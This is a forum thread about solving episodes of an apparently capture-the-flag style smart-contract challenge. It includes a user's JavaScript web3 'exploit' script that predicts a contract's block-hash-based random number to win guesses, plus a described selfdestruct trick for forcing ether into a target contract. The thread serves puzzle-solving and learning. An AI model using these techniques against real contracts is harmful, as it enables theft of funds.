Forum Discussion

    • IotS2024's avatar
      IotS2024
      Icon for Bronze III rankBronze III

      Wow, that are some interesting thoughts.

      EP2: Tried Bytecode decompilation (with various solidity decompilers) and cyber chef, but my brain blocks when it reads blockchain and java

      EP4: I will look into this, thank you for the advise

      EP5: This is a very very interesting approach. It looks very promising. Thx for that hint :) 

      • IotS2024's avatar
        IotS2024
        Icon for Bronze III rankBronze III

        EP5: I set up an own contract with a selfDestruct function. The payout address on destruction was set to the Robin Hood contract address. So on destruction the payout should go to this contract and could not be reversed (at least that was my approach).

        Did I make something wrong or is this the wrong approach?

        I used the console and truffle for this approach. And yes, I transferred ether to the new deployed contract.

    • steven's avatar
      steven
      Icon for Silver I rankSilver I

      it's just hex. go on a 'expedition' and search for some 'input' to hex-it out :)

      • IotS2024's avatar
        IotS2024
        Icon for Bronze III rankBronze III

        OMFG, yes you are absolutely right. This one was harder then EP-5 for me :)

        Finally found the input you mentioned. But it was a bit hidden... Thx very much

  • async function exploit() {
        try {
            // Step 1: Get the last block number
            web3.eth.getBlockNumber((error, lastBlockNumber) => {
                if (error) {
                    console.error("Error fetching block number:", error);
                } else {
                    lastBlockNumber -= 1;  // Adjust for the previous block
                    console.log("Last Block Number:", lastBlockNumber);
    
                    // Step 2: Fetch the block details using the block number
                    web3.eth.getBlock(lastBlockNumber, (error, block) => {
                        if (error) {
                            console.error("Error fetching block details:", error);
                        } else {
                            console.log("Block Details:", block);
                            let blockHash = block.hash;
                            console.log("Block Hash:", blockHash);
    
                            // Step 3: Convert the block hash to BigNumber
                            let hashVal = web3.toBigNumber("0x" + blockHash.substring(2));
                            console.log("Block Hash (BigNumber):", hashVal.toString());
    
                            // Step 4: Define the factor and max values
                            let FACTOR = web3.toBigNumber("35747612576471498868021289613942548619904587962479648126103951055944713673995");
                            let max = web3.toBigNumber(10);
    
                            // Step 5: Calculate the factor
                            let factor = FACTOR.mul(100).div(max);
                            console.log("Factor:", factor.toString());
    
                            // Step 6: Generate the random number based on block hash
                            let randomNumber = hashVal.div(factor).mod(max).add(1).toNumber(); // Ensure it's within range
                            console.log("Generated Random Number (BigNumber):", randomNumber.toString());
    
                            // Step 7: Interact with the contract
                            contract.guess(randomNumber).then((result) => {
                                console.log("Guess sent: Success!", result);
    
                                // Step 8: Query the contract for the number of successful guesses
                                contract.correctNumberCount()
                                    .then((correctNumberCount) => {
                                        console.log(`Number of successful guesses: ${correctNumberCount}`);
                                    })
                                    .catch((error) => {
                                        console.error("Error fetching correct number count:", error);
                                    });
                            })
                            .catch((error) => {
                                console.error("Error sending guess:", error);
                            });
                        }
                    });
                }
            });
        } catch (error) {
            console.error("Unexpected error:", error);
        }
    }
    
    exploit();

    I tried this one so far for EP-4. Do I have an error in my thoughts?

    • netcat's avatar
      netcat
      Icon for Silver I rankSilver I

      Got logged out, answer vanished. Short version:
      If your write JS code that is correct you'll never get the same result.
      If your write a smart contract that is correct you'll get the same result.

      Why...?

      Don't read the hint, unless you really want a hint.
      Hint 1: Write both JS and smart contract side to side...more hints on request.